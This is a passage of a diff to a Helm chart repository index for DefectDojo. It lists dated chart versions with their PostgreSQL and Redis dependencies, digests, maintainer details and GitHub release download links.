e91b1af4cafb5836eeac018af0304f1eb5b9ca6c544f931f88e8ba4374db0f10 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/defectdojo-1.6.190-dev.tgz + version: 1.6.190-dev + - apiVersion: v2 + appVersion: 2.46.4 + created: "2025-05-27T16:22:04.297988841Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: b4676450f67d562ef705758b8561bdc2005faff538b948c0ba715b63aef68865 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.46.4/defectdojo-1.6.189.tgz + version: 1.6.189 + - apiVersion: v2 + appVersion: 2.47.0-dev + created: "2025-05-27T06:06:48.376269501Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3de5b9f7815ebffd08f34c6134f5a60f85d64d339af7b496b6f276b84cc57a2d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/defectdojo-1.6.189-dev.tgz + version: 1.6.189-dev + - apiVersion: v2 + appVersion: 2.46.3 + created: "2025-05-19T15:42:45.854700533Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 90f0785313a9a6292c90d0a219c0a95cc1547af6be97f1efa2d893c60a7ac837 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.46.3/defectdojo-1.6.188.tgz + version: 1.6.188 + - apiVersion: v2 + appVersion: 2.46.2 + created: "2025-05-12T15:03:45.335493382Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2d485ae4f2f17b0c4bdccbb84f455ae3900d606ab996003953cf45af3baaa664 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.46.2/defectdojo-1.6.187.tgz + version: 1.6.187 + - apiVersion: v2 + appVersion: 2.46.1 + created: "2025-05-07T18:17:14.078900373Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3e72594ff186c4065023b5d4c4ed96bd002fdc478a28f97f5eafe86a5209ea50 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.46.1/defectdojo-1.6.186.tgz + version: 1.6.186 + - apiVersion: v2 + appVersion: 2.46.0 + created: "2025-05-06T16:26:48.951775489Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f2029470b2e3f8f882af610b2b5fbbaea7d3a6a3035bd42a0338d067c8ba60b9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.46.0/defectdojo-1.6.185.tgz + version: 1.6.185 + - apiVersion: v2 + appVersion: 2.45.3 + created: "2025-04-28T15:15:25.436764426Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c45c6adfb74d239a872839fddce36ab2a3bbe16be8bdae0d6396bd290c993488 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.45.3/defectdojo-1.6.184.tgz + version: 1.6.184 + - apiVersion: v2 + appVersion: 2.45.2 + created: "2025-04-22T02:34:41.555072424Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: d0132ffb91a6c69b33f916741f8b8d658f77537c9a75742cf9da4e749389da89 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.45.2/defectdojo-1.6.183.tgz + version: 1.6.183 + - apiVersion: v2 + appVersion: 2.45.1 + created: "2025-04-14T15:41:33.718217545Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e2c0ad7b5491b201e0618109a79346da9fbf9eab3b4f7a386dc6d79f279a2ab1 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.45.1/defectdojo-1.6.182.tgz + version: 1.6.182 + - apiVersion: v2 + appVersion: 2.45.0 + created: "2025-04-07T15:17:11.534210972Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.6.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ed74ea819c903bd94acceabac6b56cf271e852ae018d4f4ec522aea0a838ffdd + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.45.0/defectdojo-1.6.181.tgz + version: 1.6.181 + - apiVersion: v2 + appVersion: 2.44.4 + created: "2025-03-31T15:44:33.316024774Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c1563f52ba639fdc3dba5a6ee352e6de39e40a0eeafa6daa8dece0e0ab99bb92 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.44.4/defectdojo-1.6.180.tgz + version: 1.6.180 + - apiVersion: v2 + appVersion: 2.44.3 + created: "2025-03-24T14:54:53.033675657Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: cb2ce68f0f24c0f296bfed12e489bae3e7b30bd2fa47accdd8714871db73b8db + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.44.3/defectdojo-1.6.179.tgz + version: 1.6.179 + - apiVersion: v2 + appVersion: 2.44.2 + created: "2025-03-17T14:47:56.587174712Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 672dfbe209f00a416dcd67d8c85271ee05b24edba544fc5610e1bf2aa6672f6e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.44.2/defectdojo-1.6.178.tgz + version: 1.6.178 + - apiVersion: v2 + appVersion: 2.44.1 + created: "2025-03-10T15:32:21.036668835Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0ddc640b16725ab4f46f960c3400708ba34ff9e4a2fff3d3a4542302bba34e31 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.44.1/defectdojo-1.6.177.tgz + version: 1.6.177 + - apiVersion: v2 + appVersion: 2.44.0 + created: "2025-03-10T14:50:35.602925846Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c27f840b01b4543deda0cde6eda9d01b1e99dfdc5a4a82ea7b0945784bbee2ee + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.44.0/defectdojo-1.6.176.tgz + version: 1.6.176 + - apiVersion: v2 + appVersion: 2.43.4 + created: "2025-02-24T15:07:00.006897088Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ac8af33e9e8b891f3be9f95524d037a904a7ee360ba234aa0b4cc30b7dd8e867 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.43.4/defectdojo-1.6.175.tgz + version: 1.6.175 + - apiVersion: v2 + appVersion: 2.43.3 + created: "2025-02-18T15:18:52.334249586Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ae38afb09832333caae55fb9124af901ae48538d53b9986bf10b7fe9a2ce805b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.43.3/defectdojo-1.6.174.tgz + version: 1.6.174 + - apiVersion: v2 + appVersion: 2.43.2 + created: "2025-02-12T17:34:52.472971208Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 403514682c86c556c100bf13429ead114266eb10be568aec363e04c4e45aefd6 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.43.2/defectdojo-1.6.173.tgz + version: 1.6.173 + - apiVersion: v2 + appVersion: 2.43.1 + created: "2025-02-10T15:45:41.228459228Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1a956aeeec3b620f8b69c834e269b196e6e210b7a9a4d5ce50b744afc28d6841 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.43.1/defectdojo-1.6.172.tgz + version: 1.6.172 + - apiVersion: v2 + appVersion: 2.43.0 + created: "2025-02-03T15:52:51.424385293Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.4.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: d8008d4c4f76b26daf79789d5cc0148639ca1d44803455dea852dea6def9cac4 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.43.0/defectdojo-1.6.171.tgz + version: 1.6.171 + - apiVersion: v2 + appVersion: 2.42.3 + created: "2025-01-27T15:47:55.72475851Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.3.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6e152f7aa24ba88a53ec5a5b6436a5d57c84dcb0ff366c6ab0a1a105c1c44177 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.42.3/defectdojo-1.6.170.tgz + version: 1.6.170 + - apiVersion: v2 + appVersion: 2.42.2 + created: "2025-01-21T15:42:01.581691965Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.3.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e26585a96b71373477b5df3d5f2489d87c6dc6683345c670622fdda553f943ac + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.42.2/defectdojo-1.6.169.tgz + version: 1.6.169 + - apiVersion: v2 + appVersion: 2.42.1 + created: "2025-01-13T15:38:36.052147579Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.3.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 380b293b30f37769b4a60cbb26c5a38da4571fbffb923a61b3fb49e5936ef773 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.42.1/defectdojo-1.6.168.tgz + version: 1.6.168 + - apiVersion: v2 + appVersion: 2.42.0 + created: "2025-01-06T15:11:30.873772901Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.3.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 925429a0811fc5e223bb3b58d0d83dbd7f329d8fb0ea4f723219e129bbe98bbb + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.42.0/defectdojo-1.6.167.tgz + version: 1.6.167 + - apiVersion: v2 + appVersion: 2.41.4 + created: "2024-12-30T15:48:56.383202318Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 009000f7972bbe6ddf59c3cdafc8a9fcbccb659c24afc25b4429c4a841c3ed3f + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.41.4/defectdojo-1.6.166.tgz + version: 1.6.166 + - apiVersion: v2 + appVersion: 2.41.3 + created: "2024-12-23T16:04:42.95361274Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 479cad60d9db035ebd483ea5e62b841c7b32f849e41e5c23f047dce5f7527976 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.41.3/defectdojo-1.6.165.tgz + version: 1.6.165 + - apiVersion: v2 + appVersion: 2.41.2 + created: "2024-12-16T15:50:45.854805998Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 878e69e6da8af643dcbcc8efd8f51c2cfa0c438c6514a1386b3fe92e5dc44e5c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.41.2/defectdojo-1.6.164.tgz + version: 1.6.164 + - apiVersion: v2 + appVersion: 2.40.3 + created: "2024-11-25T16:46:34.370348988Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 315e4fe211e71990bf9f64d08c2e1449d995a7e373ca55b51003a934b95d8f8c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.40.3/defectdojo-1.6.161.tgz + version: 1.6.161 + - apiVersion: v2 + appVersion: 2.40.2 + created: "2024-11-18T16:44:11.3353757Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8c45204d9c0d37f098302008a6c09d254ac10e9e81619d024ccc75b49b43c58b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.40.2/defectdojo-1.6.160.tgz + version: 1.6.160 + - apiVersion: v2 + appVersion: 2.40.1 + created: "2024-11-12T16:54:03.680585744Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c753811916e2e1574a2add0a260d300e5a922047e7437472dccb6b65e10936c5 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.40.1/defectdojo-1.6.159.tgz + version: 1.6.159 + - apiVersion: v2 + appVersion: 2.40.0 + created: "2024-11-04T17:46:58.112781203Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 14c59e680f2e227a5abdaa45a661297e371199cd5eb7690d59dca611a2f873b5 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.40.0/defectdojo-1.6.158.tgz + version: 1.6.158 + - apiVersion: v2 + appVersion: 2.39.4 + created: "2024-10-28T18:46:14.01945553Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.0.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 768494711952cfcc594dd44bc2d28ede214dc556d54cb710aa43a86d33da318f + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.39.4/defectdojo-1.6.157.tgz + version: 1.6.157 + - apiVersion: v2 + appVersion: 2.39.3 + created: "2024-10-28T15:20:38.586137077Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.0.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 000ddc6bd828fc36c2fe5d93155f729c4458564106acb0ef7b384204a2338edc + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.39.3/defectdojo-1.6.156.tgz + version: 1.6.156 + - apiVersion: v2 + appVersion: 2.39.2 + created: "2024-10-21T15:22:19.007475118Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.0.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 92b0aeb66d44f5850a86dadd276bf7628c3d4e83b988914c0c3dc87831098bea + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.39.2/defectdojo-1.6.155.tgz + version: 1.6.155 + - 